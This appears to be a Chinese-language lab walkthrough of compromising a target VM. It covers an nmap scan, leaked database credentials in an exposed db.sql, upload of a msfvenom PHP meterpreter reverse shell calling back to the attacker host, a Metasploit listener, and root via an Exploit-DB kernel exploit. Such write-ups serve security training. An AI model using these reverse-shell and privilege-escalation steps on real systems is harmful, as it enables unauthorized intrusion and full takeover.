0x00环境
攻击机IP:192.168.1.28
目标机IP:192.168.1.24
0x01实战
端口扫描
nmap -sV -p- 192.168.1.24
可以看到开放了很多端口
目录扫描
扫描出一堆东西
漏洞发现
根据扫描出来的目录查找发现
直接可以看到phpinfo
可以访问db.sql文件,直接得到数据库账户和密码
等还有其它的一些东西就不列举了。。。
漏洞利用
访问80端口HTTP服务可以知道本网站由Toby Victor开发。它由PHP和MySQL提供支持,并托管在CentOSlinux 服务器上。
尝试使用上面得到的账户admin/adminpass登录网站
成功登录,登录后我们可以发现我们可以编辑页面并上传图片
而且前面我们在网站主页得知是支持PHP的,那么我们可以尝试上传木马文件反弹shell
创建PHP木马文件尝试通过文件上传来上传
msfvenom -p php/meterpreter/reverse_tcp -o /root/shell.php lhost=192.168.1.28 lport=4444
尝试上传,如果失败再尝试绕过
在主页可以看到上传成功
创建监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.28
set lport 4444
run
在主页上点击Read more即可反弹shell
提权
查看系统信息
sysinfo
不知为何无法执行命令
使用老版kali(192.168.1.12)
内核版本为2.6.18-92.el5,在互联网查漏洞利用https://www.exploit-db.com/exploits/8478
将提权脚本下载并查看
将dos格式修改为linux格式
dos2unix 8478.sh
上传到靶机上的tmp目录中
赋予脚本执行权限并执行
chmod +x 8478.sh
报错,因为必须为脚本提供正确的 PID 才能使代码正常工作。所以现在我们必须找到一个合适的 PID,并在该 PID 的帮助下运行脚本
cat /proc/net/netlink
执行脚本,多尝试几次,成功得到root权限
./8478.sh 568